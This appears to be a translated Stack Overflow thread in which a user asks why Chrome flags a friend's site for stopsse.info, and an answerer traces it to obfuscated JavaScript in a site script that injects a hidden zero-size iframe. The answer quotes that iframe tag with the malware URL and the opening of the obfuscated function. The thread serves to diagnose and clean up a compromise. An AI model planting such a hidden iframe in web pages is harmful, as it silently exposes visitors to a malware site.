Cru*_*lIO 5 security php malware chrome
我的一些朋友有一个网站(www.kennelsoffie.dk),我会在遇到任何麻烦时尽力帮助他们。然而这一次我,想不通。当我使用 Google Chrome 访问该网站时,我看到一个警告页面,声称我尝试访问的页面包含来自 stopsse.info 的元素。
我不会任何 PHP,所以我只是下载了完整的网站,包括数据库的备份(即 .sql 文件)。然后,我在所有文件中搜索了 stopsse,但没有找到任何内容。
我还使用 siteadvisor.com 测试了该站点,它说“我们测试了该站点,但没有发现任何重大问题”。
PHP 是否可以隐藏对恶意软件站点的引用,以便我无法通过简单的搜索找到它?如果是这样,你怎么能找到它?
小智 5
我在生成的源中找到了这个
<iframe height="0" width="0" src="http://stopssse.info/l.php?thx" style="display: none; visibility: hidden;">
它就在 body 标签的正下方,它不在实际的页面源中,它是由混淆的 javascript 添加的
编辑:如果您查看http://www.kennelsoffie.dk/includes/jscript.js的底部,您会看到一个非常奇怪的 javascript 函数。这就是我告诉你的混淆的 javascript 函数。它始于
function lIIlOlIllI1000llII10l0OIIIlIOlIOI1O010l0(O00I10I0l00I0IOIO1Ol10O0Ol1Il1lI10OI00Il){var
最好的办法是找到并删除它。
| 归档时间: |
|
| 查看次数: |
4101 次 |
| 最近记录: |